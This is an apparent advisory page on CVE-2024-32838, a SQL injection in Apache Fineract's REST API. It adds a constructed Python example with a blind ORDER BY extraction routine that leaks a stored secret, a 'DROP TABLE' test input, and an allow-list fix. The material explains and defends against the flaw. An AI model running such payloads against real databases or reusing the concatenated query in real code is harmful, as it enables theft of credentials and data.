SQL Injection Vulnerability in Apache Fineract by Apache
CVE-2024-32838
What is CVE-2024-32838?
CVE-2024-32838 is a SQL injection vulnerability in Apache Fineract, the open-source core banking platform used to build and manage financial products. It affects Apache Fineract versions 1.4 through 1.9 and allows an authenticated user to inject SQL through parameters of specific REST API endpoints. Exploitation can expose or alter sensitive data and change application behaviour, a significant risk for organizations that run their financial operations on Fineract.
Technical Details
The vulnerability resides in several REST API endpoints, including those for offices and dashboards, where values taken from request query parameters are incorporated into SQL statements without being neutralized. An attacker with valid credentials can craft those parameters so that the resulting query executes SQL of the attacker's choosing, leading to disclosure or corruption of data. The issue is fixed in Apache Fineract 1.10.1, which introduces a SQL Validator that checks such parameter values before they are used in a query.
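To make the mechanism concrete, the following is an added example written in Python for this page; it is not Fineract's own code (which is Java) and does not reproduce the affected endpoints. It shows a listing endpoint that splices a caller-controlled ORDER BY parameter into its query, an extraction routine that turns the resulting sort order into a blind oracle, and a hardened variant that validates the parameter against an allow-list, in the spirit of the SQL Validator described above. The table names, columns, the `admin` user and its secret are all constructed for the example.

```python
"""Added example (not Apache Fineract code): a caller-controlled ORDER BY
parameter concatenated into SQL becomes a blind injection oracle; an
allow-list validator closes it. All table/column names are constructed."""
import sqlite3

SECRET = "s3cr3t"  # constructed stand-in for a stored credential


def make_db():
    """Build an in-memory database with a constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE m_office (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE m_appuser (id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO m_office VALUES (1, 'Head Office'), (2, 'Branch A'), (3, 'Branch B');
    """)
    conn.execute("INSERT INTO m_appuser VALUES (1, 'admin', ?)", (SECRET,))
    return conn


def list_offices_vulnerable(conn, order_by):
    """VULNERABLE: the request parameter is spliced straight into the SQL.
    Returns the office ids in the order the database produced them."""
    sql = "SELECT id, name FROM m_office ORDER BY " + order_by
    return [row[0] for row in conn.execute(sql)]


def extract_secret(conn, max_len=32):
    """Blind extraction through the vulnerable endpoint.

    The payload sorts by id when a guessed character is right and by -id
    when it is wrong, so the first id returned tells the attacker whether
    the guess was correct. No error messages or data rows are needed."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    found = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            payload = (
                f"CASE WHEN (SELECT substr(secret, {pos}, 1) FROM m_appuser "
                f"WHERE username = 'admin') = '{c}' THEN id ELSE -id END"
            )
            if list_offices_vulnerable(conn, payload)[0] == 1:
                found += c
                break
        else:
            break  # no candidate matched: past the end of the secret
    return found


# Hardened variant: only known column names and directions are accepted.
ALLOWED_SORT_COLUMNS = {"id", "name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def validate_sort(order_by, direction):
    """Allow-list check for sort parameters; rejects anything else."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return order_by, direction


def list_offices_hardened(conn, order_by="id", direction="asc"):
    """Same query, but only validated identifiers reach the SQL text."""
    col, dirn = validate_sort(order_by, direction)
    sql = f"SELECT id, name FROM m_office ORDER BY {col} {dirn}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable endpoint:", extract_secret(db))
    print("hardened, name desc:", list_offices_hardened(db, "name", "desc"))
    try:
        list_offices_hardened(db, "id; DROP TABLE m_office", "asc")
    except ValueError as err:
        print("hardened endpoint rejected payload:", err)
```

Identifiers such as column names cannot be passed as bound parameters, which is why the hardened version validates them against a fixed set rather than trying to escape them; the same applies to any fragment of SQL syntax (sort direction, table name) taken from a request.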
Potential impact of CVE-2024-32838
- Data breaches: exploitation can give an attacker unauthorized access to sensitive financial data, compromising customer information and organizational integrity.
- System compromise: injected SQL can manipulate the database, leading to unexpected behaviour, data loss, or further compromise of the system.
- Operational disruption: exploitation can reduce system reliability and availability, affecting business continuity and service delivery for organizations that depend on Apache Fineract for their financial transactions.
Affected Version(s)
Apache Fineract 1.4 <= 1.9